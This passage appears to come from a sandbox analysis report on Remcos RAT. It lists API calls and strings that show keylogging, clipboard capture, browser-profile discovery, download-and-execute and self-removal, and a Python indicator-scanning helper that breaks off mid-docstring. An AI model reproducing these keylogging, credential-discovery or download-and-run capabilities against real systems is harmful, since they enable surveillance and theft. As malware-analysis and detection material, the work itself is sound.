• OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
• CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
• CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
Memory Dump Source
• Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
Similarity
• API ID: CloseHandleOpenProcess
• API String ID: 39102293-0
APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
  • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
• _UnwindNestedFrames.LIBCMT ref: 00439891
• ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
• CallCatchBlock.LIBVCRUNTIME ref: 004398C7
Memory Dump Source
• Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
Similarity
• API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
• API String ID: 2633735394-0
APIs
• GetSystemMetrics.USER32(0000004C), ref: 004193F0
• GetSystemMetrics.USER32(0000004D), ref: 004193F6
• GetSystemMetrics.USER32(0000004E), ref: 004193FC
• GetSystemMetrics.USER32(0000004F), ref: 00419402
Memory Dump Source
• Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
Similarity
• API ID: MetricsSystem
• API String ID: 4116985748-0
APIs
• ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
• ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
• ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
  • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
• ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
Memory Dump Source
• Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
Similarity
• API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
• API String ID: 1761009282-0
APIs
  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
• __Init_thread_footer.LIBCMT ref: 0040B797
Memory Dump Source
• Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
Similarity
• API ID: Init_thread_footer__onexit
• String ID: [End of clipboard]$[Text copied to clipboard]
• API String ID: 1881088180-3686566968
                                        APIs
                                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ACP$OCP
                                        • API String ID: 0-711371036
                                        • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                        • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                                        • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                        • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                                        APIs
                                        • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                        • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                                        Strings
                                        • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LocalTime
                                        • String ID: KeepAlive | Enabled | Timeout:
                                        • API String ID: 481472006-1507639952
                                        • Opcode ID: 889eda472554f13da5ed19224a724834adbe5322b7fc00b68ad75e81c6f62207
                                        • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                                        • Opcode Fuzzy Hash: 889eda472554f13da5ed19224a724834adbe5322b7fc00b68ad75e81c6f62207
                                        • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                                        APIs
                                        • Sleep.KERNEL32 ref: 00416640
                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DownloadFileSleep
                                        • String ID: !D@
                                        • API String ID: 1931167962-604454484
                                        • Opcode ID: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
                                        • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                                        • Opcode Fuzzy Hash: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
                                        • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                                        APIs
                                        • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LocalTime
                                        • String ID: | $%02i:%02i:%02i:%03i
                                        • API String ID: 481472006-2430845779
                                        • Opcode ID: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
                                        • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                                        • Opcode Fuzzy Hash: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
                                        • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                                        APIs
                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExistsFilePath
                                        • String ID: alarm.wav$hYG
                                        • API String ID: 1174141254-2782910960
                                        • Opcode ID: 7ff3f59d16e843211484a17e640aea2c904abe2f50e58eb24b0ebd234ec542ff
                                        • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                                        • Opcode Fuzzy Hash: 7ff3f59d16e843211484a17e640aea2c904abe2f50e58eb24b0ebd234ec542ff
                                        • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                                        APIs
                                          • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                          • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                        • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                        • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                        • String ID: Online Keylogger Stopped
                                        • API String ID: 1623830855-1496645233
                                        • Opcode ID: e1143dfe4ebbdf49b26d73ef465cebd6e20b11e5a8ab35f70cc7b7b67a3e30d6
                                        • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                                        • Opcode Fuzzy Hash: e1143dfe4ebbdf49b26d73ef465cebd6e20b11e5a8ab35f70cc7b7b67a3e30d6
                                        • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                                        APIs
                                        • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                        • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wave$BufferHeaderPrepare
                                        • String ID: XMG
                                        • API String ID: 2315374483-813777761
                                        • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                        • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                        • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
                                        • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                        APIs
                                        • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LocaleValid
                                        • String ID: IsValidLocaleName$JD
                                        • API String ID: 1901932003-2234456777
                                        • Opcode ID: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                                        • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                                        • Opcode Fuzzy Hash: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                                        • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                                        APIs
                                        • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExistsFilePath
                                        • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                        • API String ID: 1174141254-4188645398
                                        • Opcode ID: 0abb7ee2847cb982712fb7fefd416b01b1d23bf2ba6ce40aabdd3cde21ab4378
                                        • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                                        • Opcode Fuzzy Hash: 0abb7ee2847cb982712fb7fefd416b01b1d23bf2ba6ce40aabdd3cde21ab4378
                                        • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                                        APIs
                                        • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExistsFilePath
                                        • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                        • API String ID: 1174141254-2800177040
                                        • Opcode ID: 0d29ba65b5b4eed9e3d7e50455c49f35e463ab29ad96f4d2c3ad675a2282e63f
                                        • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                                        • Opcode Fuzzy Hash: 0d29ba65b5b4eed9e3d7e50455c49f35e463ab29ad96f4d2c3ad675a2282e63f
                                        • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                                        APIs
                                        • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExistsFilePath
                                        • String ID: AppData$\Opera Software\Opera Stable\
                                        • API String ID: 1174141254-1629609700
                                        • Opcode ID: 421cc93c7b3529087b7bfe0f56a46d6b25e2e17e9998e8b4adf1b46cb1cdeea0
                                        • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                                        • Opcode Fuzzy Hash: 421cc93c7b3529087b7bfe0f56a46d6b25e2e17e9998e8b4adf1b46cb1cdeea0
                                        • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                                        APIs
                                        • GetKeyState.USER32(00000011), ref: 0040B64B
                                          • Part of subcall function 0040A3E0: GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A416
                                          • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                          • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                          • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                          • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?,?,004750F0), ref: 0040A43E
                                          • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(00475144,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                          • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                          • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                        • String ID: [AltL]$[AltR]
                                        • API String ID: 2738857842-2658077756
                                        • Opcode ID: 2b71d764483a078f53a432e7892b7890680e208db1d279d2457640738fc20bd0
                                        • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                                        • Opcode Fuzzy Hash: 2b71d764483a078f53a432e7892b7890680e208db1d279d2457640738fc20bd0
                                        • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                                        APIs
                                        • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                        • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: uD
                                        • API String ID: 0-2547262877
                                        • Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                        • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                                        • Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                        • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                                        APIs
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExecuteShell
                                        • String ID: !D@$open
                                        • API String ID: 587946157-1586967515
                                        • Opcode ID: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
                                        • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                                        • Opcode Fuzzy Hash: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
                                        • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                                        APIs
                                        • GetKeyState.USER32(00000012), ref: 0040B6A5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: State
                                        • String ID: [CtrlL]$[CtrlR]
                                        • API String ID: 1649606143-2446555240
                                        • Opcode ID: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                                        • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                                        • Opcode Fuzzy Hash: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
                                        • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                                        APIs
                                          • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                        • __Init_thread_footer.LIBCMT ref: 00410F29
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Init_thread_footer__onexit
                                        • String ID: ,kG$0kG
                                        • API String ID: 1881088180-2015055088
                                        • Opcode ID: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                                        • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                                        • Opcode Fuzzy Hash: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                                        • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                                        APIs
                                        • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D144,00000000,004752D8,004752F0,?,pth_unenc), ref: 00413A31
                                        • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A45
                                        Strings
                                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DeleteOpenValue
                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                        • API String ID: 2654517830-1051519024
                                        • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                        • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                                        • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                        • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                                        APIs
                                        • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
                                        • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DeleteDirectoryFileRemove
                                        • String ID: pth_unenc
                                        • API String ID: 3325800564-4028850238
                                        • Opcode ID: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                                        • Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
                                        • Opcode Fuzzy Hash: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                                        • Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8
                                        APIs
                                        • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                        • WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ObjectProcessSingleTerminateWait
                                        • String ID: pth_unenc
                                        • API String ID: 1872346434-4028850238
                                        • Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                        • Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
                                        • Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                        • Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                                        • GetLastError.KERNEL32 ref: 00440D35
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide$ErrorLast
                                        • String ID:
                                        • API String ID: 1717984340-0
                                        • Opcode ID: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                        • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                                        • Opcode Fuzzy Hash: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                        • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                                        APIs
                                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411B8C
                                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C58
                                        • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
                                        • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLastRead
                                        • String ID:
                                        • API String ID: 4100373531-0
                                        • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                        • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                                        • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                        • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99
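The function entries above pair each API call with the strings the Remcos payload references around it: keylogger and clipboard log markers ("Online Keylogger Stopped", "[Text copied to clipboard]"), the "KeepAlive | Enabled | Timeout: " log line, the browser profile paths checked with PathFileExistsW, the Policies\Explorer\Run key, and "pth_unenc" next to the self-removal calls (DeleteFileW, RemoveDirectoryW, RegDeleteValueW, TerminateProcess). A practitioner confirming these indicators in a dump of the 0x400000 region needs to search for them in both narrow and UTF-16LE form, because the W-suffixed APIs listed (PathFileExistsW, RegOpenKeyExW) consume wide strings. The following Python is an added triage example, not Joe Sandbox code: the indicator strings are copied from the String ID fields above, while the capability labels, the assumption that the dump is a flat byte image, and the sample buffer it scans are this example's own constructions.

```python
"""Triage helper: search a raw memory dump for the Remcos string indicators
listed in the function entries above and map hits to capabilities.

Added example for this report, not Joe Sandbox code. The capability labels
and the sample buffer below are this example's own constructions."""
import sys
from typing import Dict, List, Tuple

# Indicator -> capability label. Strings are copied from the "String ID"
# fields above; the labels are an analyst's grouping, not report fields.
CAPABILITY: Dict[str, str] = {
    "[Text copied to clipboard]": "clipboard-logging",
    "[End of clipboard]": "clipboard-logging",
    "Online Keylogger Stopped": "keylogging",
    "[AltL]": "keylogging",
    "[AltR]": "keylogging",
    "[CtrlL]": "keylogging",
    "[CtrlR]": "keylogging",
    "KeepAlive | Enabled | Timeout: ": "c2-keepalive",
    "%02i:%02i:%02i:%03i": "timestamped-logging",
    "alarm.wav": "alarm-sound",
    "\\AppData\\Local\\Google\\Chrome\\": "browser-profile-discovery",
    "\\AppData\\Local\\Microsoft\\Edge\\": "browser-profile-discovery",
    "\\Opera Software\\Opera Stable\\": "browser-profile-discovery",
    "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\": "policies-run-key",
    "pth_unenc": "uninstall",
}

Hit = Tuple[int, str, str]  # (offset, encoding, indicator)


def needles(indicator: str) -> Dict[str, bytes]:
    """Both byte forms worth searching: narrow (ASCII) and the UTF-16LE form
    that the W-suffixed APIs above (PathFileExistsW, RegOpenKeyExW) consume."""
    return {"ascii": indicator.encode("ascii"),
            "utf-16le": indicator.encode("utf-16-le")}


def scan(buf: bytes, indicators=tuple(CAPABILITY)) -> List[Hit]:
    """Return every occurrence of every indicator, sorted by offset."""
    hits: List[Hit] = []
    for ind in indicators:
        for enc, needle in needles(ind).items():
            pos = buf.find(needle)
            while pos != -1:
                hits.append((pos, enc, ind))
                pos = buf.find(needle, pos + 1)
    return sorted(hits)


def summarize(hits: List[Hit]) -> List[str]:
    """Distinct capability labels implied by the hits, sorted."""
    return sorted({CAPABILITY[ind] for _, _, ind in hits})


def build_sample() -> bytes:
    """Constructed stand-in for a dump (not real data): zero filler with four
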